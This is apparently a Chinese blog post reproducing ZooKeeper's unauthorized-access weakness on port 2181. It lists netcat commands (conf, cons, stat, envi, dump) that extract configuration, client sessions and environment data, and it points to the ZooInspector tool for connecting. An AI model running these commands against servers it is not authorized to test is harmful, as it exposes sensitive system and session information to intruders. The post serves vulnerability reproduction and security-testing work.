Zookeeper未授权访问复现
2021-12-08 本文已影响0人
YPL8
漏洞简介
ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。
ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
漏洞复现
1、获取信息-conf命令
// conf参数:输出相关服务配置的详细信息,端口、数据路径、日志路径、session 超时时间,最大连接数等。
echo conf | nc ip 2181

2、获取信息-cons命令
// 列出所有连接到当前服务器的客户端/会话的详细信息。
echo cons | nc ip 2181

3、获取信息-stat命令
// 列出关于性能和连接的客户端的统计信息
echo stat | nc ip 2181

4、获取信息-envi命令
// 打印有关服务环境的详细信息
echo envi | nc ip 2181

5、获取信息-dump命令
// 输出未处理的会话和临时节点,leader 节点有效
echo dump | nc ip 2181

6、可视化工具连接
工具下载链接:https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
第二步添加ip
第三步添加SessionTracker,上述dump命令可获取到

